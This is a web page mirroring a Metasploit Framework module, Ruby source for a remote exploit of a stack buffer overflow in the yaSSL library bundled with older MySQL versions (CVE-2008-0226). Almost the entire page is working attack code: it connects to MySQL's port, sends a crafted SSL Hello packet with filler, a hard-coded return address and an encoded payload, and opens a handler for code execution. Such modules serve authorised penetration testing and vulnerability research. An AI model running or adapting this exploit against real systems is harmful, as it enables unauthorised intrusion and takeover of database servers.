CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/mysql/mysql_yassl_hello.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'MySQL yaSSL SSL Hello Message Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)

16
        implementation bundled with MySQL <= 6.0. By sending a specially crafted

17
        Hello packet, an attacker may be able to execute arbitrary code.

18
      },

19
      'Author'         => [ 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2008-0226' ],

24
          [ 'OSVDB', '41195' ],

25
          [ 'BID', '27140' ],

26


27
        ],

28
      'Privileged'     => false,

29
      'Payload'        =>

30
        {

31
          'Space'    => 100,

32
          'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c",

33
        },

34
      'Platform'       => 'linux',

35
      'Targets'        =>

36
        [

37
          [ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ],

38
        ],

39
      'DefaultTarget'  => 0,

40
      'DisclosureDate' => '2008-01-04'))

41


42
    register_options(

43
      [

44
        Opt::RPORT(3306)

45
      ])

46
  end

47


48
  def exploit

49
    connect

50


51
    sock.get_once

52


53
    req_uno =  [0x01000020].pack('V')

54


55
    req_dos =  [0x00008daa].pack('V') + [0x40000000].pack('V')

56
    req_dos << [0x00000008].pack('V') + [0x00000000].pack('V')

57
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')

58
    req_dos << [0x00000000].pack('V') + [0x00000000].pack('V')

59
    req_dos << [0x03010000].pack('V') + [0x00000001].pack('V')

60
    req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3965)

61
    req_dos << [target.ret].pack('V') + payload.encoded

62
    req_dos << rand_text_alphanumeric(1024)

63


64
    print_status("Trying target #{target.name}...")

65


66
    sock.put(req_uno)

67
    sock.put(req_dos)

68


69
    handler

70
    disconnect

71
  end

72
end

73


74